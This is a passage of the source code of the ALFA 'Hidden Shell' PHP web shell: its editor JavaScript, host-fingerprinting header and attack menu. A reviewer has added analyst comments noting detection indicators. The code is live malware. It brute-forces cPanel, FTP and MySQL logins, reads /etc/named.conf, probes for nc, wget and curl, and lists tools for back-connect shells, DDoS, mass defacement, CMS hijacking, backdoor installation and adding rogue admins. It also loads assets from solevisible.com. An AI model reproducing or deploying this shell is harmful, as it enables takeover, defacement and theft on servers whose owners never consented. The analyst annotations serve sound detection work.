dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";}else{$("backdoor_textarea").style.display="none";}}
  1429. function saveByKey(event){
  1430.     if(!(String.fromCharCode(event.which).toLowerCase() == \'s\' && event.ctrlKey) && !(event.which == 19))return true;
  1431.     $("editor_edit_area").onsubmit();
  1432.     event.preventDefault();
  1433.     return false;
  1434. }
  1435. function setCookie(cname, cvalue, exdays){
  1436.     var d = new Date();
  1437.     d.setTime(d.getTime() + (exdays*24*60*60*1000));
  1438.     var expires = "expires="+ d.toUTCString();
  1439.     document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
  1440. }
  1441. function getCookie(name){
  1442.   var value = "; " + document.cookie;
  1443.   var parts = value.split("; " + name + "=");
  1444.   if (parts.length == 2) return parts.pop().split(";").shift();
  1445. }
  1446. function editorClose(pos){
  1447.     d.body.style.overflow = "visible";
  1448.     elem = $(pos);
  1449.     elem.setAttribute("class", "editor-anim-close");
  1450.     if(pos == "editor"){
  1451.         is_minimized = false;
  1452.     }else{
  1453.         cgi_is_minimized = false;
  1454.     }
  1455.     setTimeout(function(){
  1456.         elem.removeAttribute("class");
  1457.         elem.style.display = "none";
  1458.     }, 1000);
  1459.     d.body.style.overflow = "visible";
  1460. }
  1461. function showEditor(pos){
  1462.     $(pos).setAttribute("class", "editor-anim-show");
  1463.     $(pos+"-minimized").setAttribute("class", "minimized-hide");
  1464.     if(pos == "editor"){
  1465.         is_minimized = false;
  1466.         if(cgi_is_minimized){
  1467.             $("cgiloader-minimized").style.top = "30%";
  1468.         }
  1469.     }else{
  1470.         cgi_is_minimized = false;
  1471.         if(is_minimized){
  1472.             $("editor-minimized").style.top = "30%";
  1473.         }
  1474.     }
  1475.     d.body.style.overflow = "hidden";
  1476. }
  1477. function editorMinimize(pos){
  1478.     $(pos).setAttribute("class", "editor-anim-minimize");
  1479.     $(pos+"-minimized").setAttribute("class", "minimized-show");
  1480.     if(pos == "editor"){
  1481.         is_minimized = true;
  1482.         if(cgi_is_minimized){
  1483.             $("cgiloader-minimized").style.top = "20%";
  1484.             $("editor-minimized").style.top = "50%";
  1485.         }else{
  1486.             $("editor-minimized").style.top = "30%";
  1487.         }
  1488.     }else{
  1489.         cgi_is_minimized = true;
  1490.         if(is_minimized){
  1491.             $("cgiloader-minimized").style.top = "20%";
  1492.             $("editor-minimized").style.top = "50%";
  1493.         }else{
  1494.             $("cgiloader-minimized").style.top = "30%";
  1495.         }
  1496.     }
  1497.     d.body.style.overflow = "visible";
  1498. }
  1499. function clearEditorHistory(){
  1500.     var check = confirm("Are u Sure?");
  1501.     if(check){
  1502.         for(var i in editor_files){
  1503.             if(i != editor_current_file){
  1504.                 removeHistory(i);
  1505.             }
  1506.         }
  1507.     }
  1508. }
  1509. function editor(file, mode, arg, pwd, file_id, type){
  1510.     if(type=="dir"&&file=="..")return false;
  1511.     if(mode == "download"){
  1512.         g("FilesTools",pwd,file,"download");
  1513.         return false;
  1514.     }
  1515.     var param = "", fid = "", pure_fid = "", cwd = d.mf.c.value, can_append = true;
  1516.     file = file.trim();
  1517.     if(Object.keys(editor_files).length == 0){
  1518.         var cookie_file = getCookie("alfa_history_files");
  1519.         try{
  1520.             editor_files = JSON.parse(cookie_file);
  1521.             for(var t in editor_files){
  1522.                 insertToHistory(t, editor_files[t].file, 0, editor_files[t].type);
  1523.             }
  1524.         }catch(e){}
  1525.     }
  1526.     if(file.indexOf("/") != -1){
  1527.         var file_split = file.split("/");
  1528.         file = file_split[file_split.length - 1];
  1529.         delete file_split[file_split.length - 1];
  1530.         cwd = file_split.join("/");
  1531.         if(islinux){
  1532.             cwd = "/"+cwd;
  1533.         }
  1534.     }
  1535.     if(typeof type == "undefined"){
  1536.         type = "";
  1537.     }
  1538.     if(typeof pwd != "undefined" && pwd != null && pwd.length != 0){
  1539.         cwd = pwd.trim();
  1540.     }
  1541.     try{
  1542.         for(var i in editor_files){
  1543.             if(editor_files[i].file == decodeURIComponent(file) && editor_files[i].pwd.replace(/\//g,"") == cwd.replace(/\//g,"")){
  1544.                 can_append = false;
  1545.                 file_id = i;
  1546.                 break;
  1547.             }
  1548.         }
  1549.     }catch(e){
  1550.         console.log(e);
  1551.     }
  1552.     editor_error = true;
  1553.     if(typeof arg != "undefined" && arg.length != 0 && arg != null){
  1554.         param = alfab64(arg);
  1555.     }
  1556.     if(typeof file_id != "undefined" && file_id != null && file_id.length != 0){
  1557.         fid = alfab64(file_id);
  1558.         pure_fid = file_id;
  1559.     }else{
  1560.         var rand_fid = "file_" + getRandom(10);
  1561.         fid = alfab64(rand_fid);
  1562.         pure_fid = rand_fid;
  1563.     }
  1564.     alfaloader("block");
  1565.     _Ajax(d.URL, "a="+alfab64("FilesTools")+"&c="+alfab64(cwd)+"&alfa1="+alfab64(file)+"&alfa2="+alfab64(mode)+"&alfa3="+param+"&alfa4="+fid+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"), function(e){
  1566.         document.querySelector(".editor-content").innerHTML = e;
  1567.         $("editor").style.display  = "block";
  1568.         alfaloader("none");
  1569.         evalJS(e);
  1570.         if(mode != "delete" && editor_error){
  1571.             var active = d.getElementsByClassName("is_active");
  1572.             if(active.length != 0){
  1573.                 active[0].className = "file-holder";
  1574.             }
  1575.             fid = pure_fid;
  1576.             file = decodeURIComponent(file);
  1577.  
  1578.             if(!editor_files[fid] && can_append){
  1579.                 editor_files[fid] = {"file": file, "pwd": cwd, "type": type};
  1580.                 insertToHistory(fid, file, " is_active", type);
  1581.                 if(mode=="mkfile"){
  1582.                     g("FilesMan",null);
  1583.                 }
  1584.             }else{
  1585.                 $(fid).parentNode.className += " is_active";
  1586.             }
  1587.         }
  1588.         d.body.style.overflow = "hidden";
  1589.         d.getElementsByClassName("filestools")[0].setAttribute("fid", fid);
  1590.         if(editor_files[fid]){
  1591.             d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
  1592.         }
  1593.         editor_current_file = fid;
  1594.         if(is_minimized){
  1595.             showEditor("editor");
  1596.         }
  1597.         updateCookieEditor();
  1598.     });
  1599.     return false;
  1600. }
  1601. function insertToHistory(fid, file, mode, type){
  1602.     var active = "";
  1603.     if(mode && mode != 0){
  1604.         active = mode;
  1605.     }
  1606.     var NewElement = document.createElement("div");
  1607.     NewElement.innerHTML = "<div id=\'"+fid+"\' class=\'history\' onClick=\'reopen(this);\'><div class=\'editor-icon\'>"+loadType(file,type,fid)+"</div><div class=\'editor-file-name\'>"+file+"</div></div><div class=\'history-close\' onClick=\'removeHistory(\""+fid+"\");\'>X</div>";
  1608.     NewElement.className = "file-holder" + active;
  1609.     NewElement.addEventListener("mouseover", function(){setEditorTitle(fid,"over");this.childNodes[1].style.opacity = "1";});
  1610.     NewElement.addEventListener("mouseout", function(){setEditorTitle(fid,"out");this.childNodes[1].style.opacity = "0";});
  1611.     var refNode = d.getElementsByClassName("history-list")[0];
  1612.     refNode.insertBefore(NewElement, refNode.firstChild);
  1613. }
  1614. function loadType(file,type,id){
  1615.     if(type == "none"){
  1616.         _Ajax(d.URL, "a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[id].pwd)+"&arg="+alfab64(editor_files[id].file), function(e){
  1617.             $(id).innerHTML = "<div class=\'editor-icon\'>"+loadType(editor_files[id].file,e,id)+"</div><div class=\'editor-file-name\'>"+editor_files[id].file+"</div>";
  1618.             editor_files[id].type = e;
  1619.         });
  1620.     }
  1621.     var img = \'<img src="http://solevisible.com/icons/{type}" width="30" height="30">\';
  1622.     if(type == "file"){
  1623.         type = file.split(".");
  1624.         type  = type[type.length - 1].toLowerCase();
  1625.         var types = ["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"];
  1626.         if(types.indexOf(type) == -1){
  1627.             type = "notfound";
  1628.         }
  1629.     }else{
  1630.         type = "folder";
  1631.     }
  1632.     return img.replace("{type}",  type + ".png");
  1633. }
  1634. function updateDirsEditor(fid, fname){
  1635.     var current_path = d.mf.c.value + "/";
  1636.     var oldpath  = editor_files[fid].pwd + "/" + fname + "/";
  1637.     var newpath  = editor_files[fid].pwd + "/" + editor_files[fid].file + "/";
  1638.     oldpath = oldpath.replace(/\/\//g, "/");
  1639.     newpath = newpath.replace(/\/\//g, "/");
  1640.     current_path = current_path.replace(/\/\//g, "/");
  1641.     if(current_path.search(oldpath) != -1){
  1642.         initDir(current_path.replace(oldpath, newpath));
  1643.         d.mf.c.value = current_path.replace(oldpath, newpath);
  1644.         _Ajax(d.URL,"a="+alfab64("updatepath")+"&path="+alfab64(d.mf.c.value),function(e){console.log(e)});
  1645.     }
  1646.     for(var i in editor_files){
  1647.         var path = editor_files[i].pwd + "/";
  1648.         path = path.replace(/\/\//g, "/");
  1649.         if(path.search(oldpath) != -1){
  1650.             editor_files[i].pwd = path.replace(oldpath, newpath);
  1651.         }
  1652.     }
  1653.     var reg1 = new RegExp("\'"+oldpath.slice(0, -1)+"\'");
  1654.     var reg2 = new RegExp(fname + " \\\|</b></a>");
  1655.     d.files.innerHTML = d.files.innerHTML.replace(reg1, "\'"+newpath.slice(0, -1)+"\'");
  1656.     d.files.innerHTML = d.files.innerHTML.replace(reg2, editor_files[fid].file+" |</b></a>");
  1657.     updateCookieEditor();
  1658. }
  1659. function updateCookieEditor(){
  1660.     setCookie("alfa_history_files", JSON.stringify(editor_files), 2012);
  1661. }
  1662. function setEditorTitle(fid, mode){
  1663.     if(mode == "out" && editor_current_file != ""){
  1664.         fid = editor_current_file;
  1665.     }
  1666.     if(editor_files[fid]){
  1667.         d.getElementsByClassName("editor-path")[0].innerHTML = (editor_files[fid].pwd + "/" + editor_files[fid].file).replace(/\/\//g, "/");
  1668.     }
  1669. }
  1670. function removeHistory(el){
  1671.     delete editor_files[el];
  1672.     if($(el)){
  1673.         $(el).parentNode.parentNode.removeChild($(el).parentNode);
  1674.     }
  1675.     var elm = d.getElementsByClassName("filestools")[0];
  1676.     if(elm){
  1677.         if(elm.getAttribute("fid") == el){
  1678.             elm.outerHTML = "";
  1679.         }
  1680.     }
  1681.     if(editor_current_file == el){
  1682.         editor_current_file = "";
  1683.     }
  1684.     updateCookieEditor();
  1685. }
  1686. function getRandom(e){
  1687.     for(var i = "undefined" == typeof e ? 20 : e, t = "", s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", n = i; n > 0; --n) t += s[Math.floor(Math.random() * s.length)];
  1688.     return t
  1689. }
  1690. function reopen(el){
  1691.     var file_id = el.getAttribute("id")
  1692.     var pwd = editor_files[file_id].pwd;
  1693.     var filename = editor_files[file_id].file;
  1694.     editor(filename, "auto", "", pwd, file_id);
  1695. }
  1696. function copyToClipboard(el){
  1697.     var node = document.getElementById(el);
  1698.     if(document.selection){
  1699.         var range = document.body.createTextRange();
  1700.         range.moveToElementText(document.getElementById(el));
  1701.         range.select();
  1702.         document.execCommand("Copy");
  1703.         alert("text copied");
  1704.     }else if (window.getSelection()){
  1705.         var range = document.createRange();
  1706.         range.selectNode(document.getElementById(el));
  1707.         window.getSelection().removeAllRanges();
  1708.         window.getSelection().addRange(range);
  1709.         document.execCommand("copy");
  1710.         alert("text copied");
  1711.     }
  1712. }
  1713. function encrypt(str, pwd) {
  1714.     if (pwd == null || pwd.length <= 0) {
  1715.         return null;
  1716.     }
  1717.     str = alfab64(str, true);
  1718.     pwd = alfab64(pwd, true);
  1719.     var enc_chr = "";
  1720.     var enc_str = "";
  1721.     var i = 0;
  1722.     while (i < str.length) {
  1723.         for (var j = 0; j < pwd.length; j++) {
  1724.             enc_chr = str.charCodeAt(i) ^ pwd.charCodeAt(j);
  1725.             enc_str += String.fromCharCode(enc_chr);
  1726.             i++;
  1727.             if (i >= str.length) break;
  1728.         }
  1729.     }
  1730.     return alfab64(enc_str, true);
  1731. }
  1732. function reloadSetting(e){
  1733. alfaloader("block");
  1734. _Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(a){evalJS(a),alfaloader("none")},true);
  1735. if(e.e.value==0&&e.protect.value==1)setTimeout("location.reload()",1000);
  1736. if(e.s.value!=e.icon.value)setTimeout("location.reload()",1000);
  1737. return false
  1738. }
  1739. function reloadColors(config){
  1740.     var obj = {};
  1741.     if(typeof config == "undefined"){
  1742.         d.querySelectorAll(".colors_input").forEach(function(e){
  1743.             var id = e.getAttribute("target").replace(".", "");
  1744.             obj[id] = e.value;
  1745.         });
  1746.     }else{
  1747.         obj = config;
  1748.     }
  1749.     alfaloader("block");
  1750.     var checdk = ($("use_default_color").checked?"1":"0");
  1751.     _Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(obj))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(checdk)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){alfaloader("none");evalJS(e);},true);
  1752. }
  1753. function alfab64(a, normal){
  1754.     if(typeof normal != "undefined" || post_encryption_mode == false){
  1755.         return window.btoa(unescape(encodeURIComponent(a)));
  1756.     }
  1757.     return encrypt(a, "'._AlfaSecretKey().'");
  1758. }
  1759. function evalCss(jcss){
  1760.     var style = document.createElement("style");
  1761.     if (style.styleSheet) {
  1762.         style.styleSheet.cssText = jcss;
  1763.     } else {
  1764.         style.appendChild(document.createTextNode(jcss));
  1765.     }
  1766.     d.getElementsByTagName("head")[0].appendChild(style);
  1767. }
  1768. function colorHandlerKey(el){
  1769.     setTimeout(function(e){
  1770.         colorHandler(el);
  1771.     }, 200);
  1772. }
  1773. function colorHandler(el){
  1774.     var target = el.getAttribute("target");
  1775.     var multi = el.getAttribute("multi");
  1776.     var ishover = target.indexOf(":hover");
  1777.     if(multi){
  1778.         var array = JSON.parse(atob(multi));
  1779.         var jcss = "";
  1780.         for(i in array.multi_selector){
  1781.             jcss += i + "{"+array.multi_selector[i].replace(/{color}/g, el.value)+"}";
  1782.         }
  1783.         evalCss(jcss);
  1784.     }
  1785.     if(ishover != -1 && !multi){
  1786.         $("input_" + target.replace(".","")).value = el.value;
  1787.         $("gui_" + target.replace(".","")).value = el.value;
  1788.         var css = target+"{color: "+el.value+";}";
  1789.         evalCss(css);
  1790.     }else{
  1791.         $("input_" + target.replace(".","")).value = el.value;
  1792.         $("gui_" + target.replace(".","")).value = el.value;
  1793.         if(target == ".header_values"){
  1794.             target = ".header,.header_values";
  1795.         }
  1796.         d.querySelectorAll(target).forEach(function(e){
  1797.             e.style.color = el.value;
  1798.         });
  1799.     }
  1800. }
  1801. function importConfig(event){
  1802.     var input = event.target;
  1803.     var reader = new FileReader();
  1804.     reader.onload = function(){
  1805.       var data = reader.result;
  1806.       try{
  1807.           var conf = JSON.parse(data);
  1808.           reloadColors(conf);
  1809.       }catch(e){
  1810.           alert("Config is invalid...!");
  1811.       }
  1812.       $("importFileBtn").value = "";
  1813.     };
  1814.     reader.readAsText(input.files[0]);
  1815. }
  1816. function checkBox(){for(i=0;i<d.files.elements.length;i++){if(d.files.elements[i].type == "checkbox"){d.files.elements[i].checked = d.files.elements[0].checked;}}}
  1817. function path_history(pos){
  1818.     _Ajax(d.URL,"a="+alfab64("GetPathHistory")+"&ajax="+alfab64("true"),function(e){g("FilesMan", e);},true);
  1819. }
  1820. function runcgi(lang){
  1821.     if(cgi_is_minimized && cgi_lang == lang){
  1822.         showEditor("cgiloader");
  1823.         return false;
  1824.     }
  1825.     _Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(lang)+"&ajax="+alfab64("true"),function(e){
  1826.         d.body.style.overflow = "hidden";
  1827.         $("cgiloader").style.display = "block";
  1828.         $("cgiframe").innerHTML = e;
  1829.         cgi_lang = lang;
  1830.         if(cgi_is_minimized){
  1831.             $("cgiloader-minimized").setAttribute("class", "minimized-hide");
  1832.             setTimeout(function(){
  1833.                 $("cgiloader").removeAttribute("class");
  1834.                 if(is_minimized){
  1835.                     $("editor-minimized").style.top = "30%";
  1836.                 }
  1837.             }, 1000);
  1838.         }
  1839.     });
  1840. }
  1841. ';
  // Closes the inline script and emits three hidden helpers: the POST form dlForm
  // (fields a, c, file; target _blank), which the script's g() fills in and submits
  // for downloads, a file input wired to importConfig(), and the loader image.
  1842. echo "</script>
  1843. <form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
  1844. <input type='hidden' name='a' value='dlfile'>
  1845. <input type='hidden' name='c' value=''>
  1846. <input type='hidden' name='file' value=''>
  1847. </form>
  1848. <input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
  1849. <img id='a_loader' src='".__showicon('loader')."'>";
  // Host fingerprinting for the header. alfaEx("uname -a", ...) is called on every
  // render, even when php_uname() exists; its output is used only as the fallback.
  // php_uname() output is truncated to 120 bytes.
  // NOTE(review): alfaEx is defined outside this excerpt and presumably executes the
  // string as an OS command (confirm against its definition). If so, a web-server
  // PHP process spawning `uname -a` on a page load is a process-telemetry signal
  // worth alerting on.
  1850. $cmd_uname = alfaEx("uname -a",false,false);
  1851. $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
  // Flags the header for a later refresh when neither source produced a uname.
  1852. if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
  // Emits the start of <body>: the upload progress bar, the hidden POST form "mf",
  // and (below) the header table. $GLOBALS['cwd'] is written into the value
  // attribute of field c without HTML escaping.
  1853. echo '
  1854. </head>
  1855. <body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
  1856. <div id="up_bar"></div>
  1857. <div class="whole">
  1858. <form method="post" name="mf" style="display:none;">
  1859. <input type="hidden" name="a">
  1860. <input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
  // Adds the ten hidden alfa1..alfa10 inputs that the JS set() function populates.
  1861. for($s=1;$s<=10;$s++){
  1862. echo '<input type="hidden" name="alfa'.$s.'">';
  1863. }
  // Header table with host details: uname, uid/gid with user and group names, PHP
  // version and safe-mode state, server IP (SERVER_ADDR, else gethostbyname() of
  // SERVER_NAME, else "????"), the client's REMOTE_ADDR and the server time.
  // $uid, $user, $gid, $group and $safe_modes are set outside this excerpt; they and
  // $uname are concatenated into the HTML without escaping.
  // The statement ends inside the open "header_domains" span, which the code that
  // follows fills in.
  // NOTE(review): indicators visible in this markup are the "?solevisible" link and
  // an image loaded over plain HTTP from http://solevisible.com/images/alfa-iran.png.
  // The viewer's browser fetches that image on every render, so proxy or DNS logs
  // showing requests to that host can help locate use of this panel.
  1864. echo '<input type="hidden" name="charset">
  1865. </form>
  1866. <div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
  1867. <div class="header"><table width="100%" border="0">
  1868. <tr>
  1869. <td width="3%"><span class="header_vars">Uname:</span></td>
  1870. <td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
  1871. </tr>
  1872. <tr>
  1873. <td><span class="header_vars">User:</span></td>
  1874. <td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
  1875. <td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
  1876. </tr>
  1877. <tr>
  1878. <td><span class="header_vars">PHP:</span></td>
  1879. <td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
  1880. </tr>
  1881. <tr>
  1882. <td><span class="header_vars">ServerIP:</span></td>
  1883. <td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
  1884. </tr>
  1885. <tr>
  1886. <td width="3%"><span class="header_vars">DateTime:</span></td>
  1887. <td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
  1888. </tr>
  1889. <tr>
  1890. <td><span class="header_vars">Domains:</span></td>
  1891. <td width="76%"><span class="header_values" id="header_domains">';
  1892. if($GLOBALS['sys']=='unix'){
  1893. $d0mains = _alfa_file("/etc/named.conf",false);
  1894. if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
  1895. $count=0;
  1896. foreach($d0mains as $d0main){
  1897. if(@strstr($d0main,"zone")){
  1898. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  1899. flush();
  1900. if(strlen(trim($domains[1][0])) > 2){
  1901. flush();
  1902. $count++;}}}
  1903. echo "$count Domains";}}
  1904. else{echo("Cant Read [ /etc/named.conf ]");}
  1905. echo '</span></td>
  1906. </tr>
  1907. <tr>
  1908. <td height="16"><span class="header_vars">HDD:</span></td>
  1909. <td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
  1910. </tr>';
  1911. if($GLOBALS['sys']=='unix'){
  1912. $useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
  1913. if(!@ini_get('safe_mode')){
  1914. if(strlen(alfaEx("id",false,false))>0){
  1915. echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
  1916. $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
  1917. $x=0;
  1918. foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
  1919. if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
  1920. echo '</td>
  1921. </tr>
  1922. <tr>
  1923. <td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
  1924. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1925. $x=0;
  1926. foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
  1927. if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
  1928. echo '</td>
  1929. </tr>';
  1930. }else{
  1931. echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
  1932. }
  1933. }else{
  1934. echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
  1935. }
  1936. }else{
  1937. echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
  1938. echo alfaEx('ver',false,false);
  1939. echo '</td>
  1940. </tr> <tr>
  1941. <td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
  1942. </tr></b>';
  1943. }
  1944. $quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
  1945. echo '<tr>
  1946. <td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
  1947. </tr>
  1948. <tr>
  1949. <td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
  1950. </tr>
  1951. <tr>
  1952. <td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
  1953. </tr>
  1954. <tr>
  1955. <td height="11"><span class="header_vars">SoftWare: </span></td>
  1956. <td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
  1957. </tr>';
  1958. if($GLOBALS['sys']=="win"){
  1959. echo '<tr>
  1960. <td height="12"><span class="header_vars">DRIVE:</span></td>
  1961. <td colspan="2"><b>'.$drives.'</b></td>
  1962. </tr>';
  1963. }
  1964. echo '<tr>
  1965. <td height="12"><span class="header_vars">PWD:</span></td>
  1966. <td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td>
  1967. </tr>
  1968. </table>
  1969. </div>
  1970. <div id="meunlist">
  1971. <ul>
  1972. ';
  1973. $li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2',
  1974. 'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
  1975. 'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
  1976. 'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher',
  1977. 'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
  1978. );
  1979. foreach($li as $key=>$value){
  1980. echo('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\''.$key.'\',null,\'\',\'\',\'\');">'.$value.'</a></li>'."\n");
  1981. }
  1982. if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass']))
  1983. echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
  1984. else
  1985. echo '</ul></div>';}else{
  1986. @error_reporting(E_ALL ^ E_NOTICE);
  1987. @ini_set('error_log',NULL);
  1988. @ini_set('log_errors',0);
  1989. @ini_set('max_execution_time',0);
  1990. @ini_set('magic_quotes_runtime', 0);
  1991. @set_time_limit(0);
  1992. }}
  1993. function alfalogout(){
        // Analyst note: "logout" only removes the AlfaUser/AlfaPass session keys (the same
        // keys the menu code tests before showing the LogOut link) and prints a status
        // line. The session itself is not destroyed by this function.
  1994. unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
  1995. echo("<center><font color='red'>Logout...</font></center>");
  1996. }
  1997. function showAnimation($name){
        // Builds an inline CSS declaration (vendor-prefixed plus standard) that plays the
        // keyframe animation $name for 800ms, ease-in-out, fill-mode forwards.
        // $name is concatenated as-is; pure UI helper with no server-side effect.
  1998.     return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
  1999. }
  2000. function __showicon($r){
        // Maps an icon key ('btn', 'alfamini', 'loader') to an image URL on solevisible.com.
